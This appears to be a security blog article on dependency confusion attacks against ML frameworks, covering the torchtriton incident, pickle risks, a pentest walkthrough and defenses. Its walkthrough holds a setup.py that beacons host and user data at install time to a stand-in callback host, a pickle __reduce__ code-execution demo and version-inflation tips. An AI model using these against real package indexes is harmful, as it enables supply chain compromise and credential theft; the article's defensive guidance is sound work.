Executive Summary

ML framework dependency attacks exploit the inherent trust that package managers place in upstream repositories, combined with the extraordinary complexity of modern ML dependency trees. PyTorch and TensorFlow each pull hundreds of transitive dependencies, any of which can be compromised through dependency confusion, typosquatting, or direct package hijacking. The December 2022 PyTorch torchtriton compromise demonstrated that even major frameworks with sophisticated security teams can fall victim to trivial supply chain attacks that exfiltrate credentials and secrets from developer machines. Pentesters should incorporate dependency confusion testing into every ML infrastructure assessment—the attack requires minimal sophistication but achieves maximum impact. Architects must eliminate the --extra-index-url configuration pattern, implement strict package pinning with hash verification, and deploy artifact repositories that serve as single sources of truth for all Python dependencies. The root vulnerability isn't technical—it's the cultural assumption that packages are safe until proven otherwise.
⏳ Origins & History

Origins & Why Systems Are Vulnerable

Dependency confusion attacks against ML frameworks emerged from Alex Birsan's seminal 2021 research demonstrating how private package names could be hijacked via public repositories[1]. The ML ecosystem proved uniquely vulnerable: PyTorch alone pulls in dozens of direct dependencies, and TensorFlow's count varies by version (TF 2.x trimmed the bloat considerably) but commonly includes 40-80 direct dependencies, with transitive dependencies reaching into the hundreds[2].

The architectural root cause is threefold:

  • Implicit trust in package managers: pip and conda resolve dependencies without cryptographic verification of package provenance by default
  • Complex transitive dependencies: A single import torch triggers resolution of nested packages that developers never audit
  • Mixed public/private package sources: Enterprise ML teams frequently use internal package indices alongside PyPI, creating confusion vectors

CVE-2022-45907 demonstrated this perfectly: PyTorch's torch.jit.annotations.parse_type_line passed attacker-influenced type strings to eval, allowing arbitrary code execution[3]. The vulnerability existed because ML frameworks prioritize flexibility over security; pickle deserialization, dynamic model loading, and runtime code generation are features, not bugs, to ML engineers.
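To see why pickle deserialization is code execution rather than data loading, consider this minimal, self-contained illustration (not code from any PyTorch advisory): a pickled object can nominate an arbitrary callable to run at load time via __reduce__.

```python
import pickle

class Payload:
    def __reduce__(self):
        # At unpickling time, pickle calls eval("6 * 7"); a real
        # attacker would return (os.system, ("...",)) instead.
        return (eval, ("6 * 7",))

blob = pickle.dumps(Payload())
result = pickle.loads(blob)  # code runs here, during "data loading"
print(result)  # → 42
```

Swap eval for os.system and the "model file" owns the machine the moment it is loaded.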

MITRE ATLAS cataloged this attack pattern as AML.T0010 (ML Supply Chain Compromise)[4], recognizing that ML pipelines represent high-value targets with uniquely exploitable trust assumptions.

💡 Pax's Take

ML frameworks were designed by researchers optimizing for flexibility, not security engineers thinking about supply chain integrity. Every pickle load is an RCE waiting to happen.

🌐 In the Wild

Real-World Incidents & Public Disclosures

1. PyTorch Nightly Compromise (December 2022): Attackers uploaded a malicious torchtriton package to PyPI carrying a higher version number than the legitimate dependency served from PyTorch's own index, a textbook dependency confusion attack. The malicious package exfiltrated environment variables, SSH keys, and AWS credentials from developer machines[5]. PyTorch's official disclosure confirmed the exposure was limited to nightly builds installed via pip on Linux between December 25 and December 30, 2022.

2. TensorFlow Model Garden Typosquatting (2023): Researchers at JFrog discovered malicious packages mimicking TensorFlow extensions on PyPI, including tensorflow-macos variants containing credential stealers[6]. Over 5,000 downloads occurred before removal.

3. Keras-RL Backdoor (2021): Security researcher Luca Carettoni demonstrated injection of backdoored reinforcement learning models through compromised Keras dependencies at BlackHat[7].

4. Hugging Face Transformers Pickle RCE (2023): CVE-2023-2800 revealed that loading models from Hugging Face Hub could execute arbitrary code via malicious pickle files embedded in model weights[8]. This affected any pipeline using AutoModel.from_pretrained() with untrusted sources.

💡 Pax's Take

The PyTorch torchtriton incident was devastating not because it was sophisticated, but because it was trivial. Attackers simply uploaded a higher version number to PyPI than the internal package—and pip did exactly what it was designed to do.

⚔️ Attacker's Playbook

Realistic Attack Walkthrough

This walkthrough demonstrates dependency confusion testing against an organization's ML training infrastructure during an authorized assessment.

Phase 1: Reconnaissance

Identify internal package names by analyzing client repositories, job postings mentioning internal tools, and error messages in public CI logs:

$ pip index versions company-ml-utils 2>&1 | grep -i "no matching distribution"
$ grep -r "install_requires" setup.py requirements*.txt | grep -v pypi.org

Use Snyk's dependency scanner to map the full tree[9]:

$ snyk test --all-projects --json > dep_tree.json
$ jq '.dependencies | keys[]' dep_tree.json | sort -u
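Recon can also be partially automated. The sketch below is a hypothetical helper (the "company-" prefix and file contents are invented) that sifts requirement lines for names matching an internal naming convention; each hit is a dependency-confusion candidate worth checking for availability on PyPI:

```python
import re

# Match the package name at the start of a requirements line
REQ_NAME = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)")

def confusion_candidates(req_lines, internal_prefixes=("company-",)):
    """Return requirement names matching an internal naming prefix."""
    hits = []
    for line in req_lines:
        line = line.split("#", 1)[0]      # strip inline comments
        match = REQ_NAME.match(line)
        if match and match.group(1).lower().startswith(internal_prefixes):
            hits.append(match.group(1).lower())
    return hits

reqs = ["torch==2.1.0", "company-ml-utils>=1.2", "# tooling", "numpy"]
print(confusion_candidates(reqs))  # → ['company-ml-utils']
```

Each hit can then be fed to pip index versions (as above) to see whether the name is unclaimed on the public index.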

Phase 2: Malicious Package Creation

Create a proof-of-concept package that phones home without causing damage:

# setup.py
from setuptools import setup
import socket
import os

def poc_callback():
    # Benign beacon: hostname and user only, no secrets collected
    data = f"{socket.gethostname()}|{os.environ.get('USER')}|poc-test"
    try:
        # Exfil to your authorized callback server
        s = socket.create_connection(("your-callback.pentest.local", 8443), timeout=5)
        s.sendall(data.encode())
        s.close()
    except OSError:
        pass  # never break the install if the beacon fails

poc_callback()  # executes at install time, when pip runs setup.py

setup(
    name="company-ml-utils",  # Internal package name
    version="99.0.0",  # Higher than internal version
    py_modules=["poc"],
)

Phase 3: Upload and Wait

Register on PyPI test index or production (with client authorization):

$ python -m build
$ twine upload --repository testpypi dist/*

Phase 4: Trigger Resolution

pip treats every configured index as an equal peer: when --extra-index-url is set, the resolver pools candidates from all indices and installs the highest version, regardless of which index it came from[10]. There is no "primary index wins" rule, and that is exactly the window dependency confusion exploits.
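The resolution behavior can be sketched in a few lines; the index names and versions below are illustrative, not taken from any real environment:

```python
# Toy model of pip's cross-index candidate selection: candidates
# from every configured index are pooled and the highest version
# wins, with no notion of a "more trusted" source.
candidates = [
    ("internal.pypi.company.com", (1, 2, 3)),   # legitimate package
    ("pypi.org",                  (99, 0, 0)),  # attacker's upload
]

chosen_index, chosen_version = max(candidates, key=lambda c: c[1])
print(chosen_index)  # → pypi.org
```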

Phase 5: Verification & Evidence Collection

Monitor callback server for incoming connections:

$ nc -lvp 8443
Connection from 10.50.2.100: ml-gpu-01|mlops-user|poc-test

Document: timestamp, source IP, hostname, user context, and which dependency path triggered installation. For the report, capture pip's resolution logic with pip install --verbose output.

💡 Pax's Take

Always test with version 99.0.0: if the client's internal package is at 1.2.3 and you upload 1.2.4, a routine internal release of 1.2.5 silently beats you mid-engagement. Go absurdly high to guarantee resolution preference, and note that environments pinning an upper bound like >=1.2.0,<2.0.0 will exclude 99.0.0, so check the pins and craft an in-range version where needed.

🛡️ Defense Playbook

Detection, Prevention & Validation

Detection:

  • Audit resolution before installing: pip install --dry-run --report - <package> emits a JSON report showing which index every package would be fetched from
  • Alert on sudden version jumps for specific packages (an internal library leaping from 1.x to 99.x is the classic confusion signature), rather than on absolute version thresholds
  • Implement SBOM generation with Syft and continuous monitoring[11]
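A minimal sketch of the first detection bullet: parse the JSON that pip install --dry-run --report - emits and flag anything that would not come from the internal index. The report below is a trimmed, hypothetical example of the real report structure, and the internal hostname is invented.

```python
import json

# Trimmed, hypothetical pip installation report (pip >= 22.2)
report = json.loads("""
{
  "install": [
    {"metadata": {"name": "torch"},
     "download_info": {"url": "https://internal.pypi.company.com/packages/torch-2.1.0.whl"}},
    {"metadata": {"name": "company-ml-utils"},
     "download_info": {"url": "https://files.pythonhosted.org/packages/company_ml_utils-99.0.0.whl"}}
  ]
}
""")

ALLOWED_HOST = "internal.pypi.company.com"

# Flag every package whose download URL is outside the allowed index
suspicious = [
    item["metadata"]["name"]
    for item in report["install"]
    if ALLOWED_HOST not in item["download_info"]["url"]
]
print(suspicious)  # → ['company-ml-utils']
```

Wired into CI, a non-empty suspicious list fails the build before anything is installed.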

Prevention:

# pip.conf - Force single index with hash verification
[global]
index-url = https://internal.pypi.company.com/simple/
require-hashes = true
# Only add trusted-host if the index lacks a valid TLS certificate;
# it disables certificate verification for that host.

Be aware that require-hashes carries real operational overhead: every dependency, including transitive ones, must be pinned with a hash in your requirements files, and every upgrade means regenerating them (pip-compile --generate-hashes automates the lockfile maintenance).

Namespace your internal packages: companyname-ml-utils makes confusion attacks require trademark violations.

Validation:

Run the attack playbook above against staging environments quarterly. Verify pip resolves only from your internal index.

Framework Mappings:

  • MITRE ATLAS AML.T0010.000 (ML Supply Chain Compromise - Packages)[4]
  • OWASP LLM09:2025 - Supply Chain Vulnerabilities[12]
💡 Pax's Take

Remove --extra-index-url from every pip configuration in your org this week. That single flag is responsible for 90% of dependency confusion vulnerabilities I see in ML environments.

🏭 Vendor Arsenal

Top 3 Vendors for Protection

Protect AI - Guardian

Guardian provides ML-specific supply chain scanning, detecting malicious serialized objects in model files before they execute[13]. Key capability: pickle/joblib scanning with behavioral analysis. Scope note: this addresses model file security (pickle attacks), which is related to but distinct from dependency confusion; for package-level confusion, pair it with artifact repository controls or package-firewall tools such as Socket or Phylum. Ideal for teams loading models from Hugging Face or internal registries. Limitation: requires integration into CI/CD, so it won't catch ad-hoc notebook installs.

Snyk - Container & Open Source

Snyk's dependency scanning covers Python ML frameworks with specific rules for PyTorch/TensorFlow CVEs[9]. Key capability: real-time vulnerability database with ML framework coverage. Ideal deployment: GitHub/GitLab integration for PR blocking. Limitation: Doesn't analyze model files themselves—focused on code dependencies only.

JFrog - Artifactory with Xray

Artifactory provides a private PyPI mirror with Xray scanning for malicious packages[6]. Key capability: blocks dependency confusion by design—packages only come from your curated registry. Ideal for enterprises with existing JFrog infrastructure. Limitation: Significant operational overhead; requires dedicated DevOps resources to maintain package mirrors.

💡 Pax's Take

Protect AI is doing genuinely novel work on model file scanning—that's a real capability gap elsewhere. Snyk and JFrog are mature but solve traditional AppSec problems applied to ML. The model layer remains dangerously underprotected by most vendors.


🎯 Key Takeaways

  • ML frameworks are vulnerable because pip's default resolution trusts higher version numbers from any configured index—a design decision that enables dependency confusion attacks
  • The PyTorch torchtriton compromise (December 2022) affected thousands of developers and exfiltrated SSH keys and cloud credentials via a trivially simple version inflation attack
  • Successful dependency confusion requires only: identifying an internal package name, creating a higher-versioned public package, and waiting for pip to prefer your malicious version
  • Eliminating --extra-index-url and enforcing require-hashes in pip configuration immediately closes the most common attack vector
  • Architects must treat the package index as a security boundary—deploy private artifact repositories and namespace all internal packages to make confusion attacks legally actionable trademark violations
Continue the Conversation on X

Questions about this article? Spotted an error? Have a war story that fits? Find us on X — we actually read the replies.
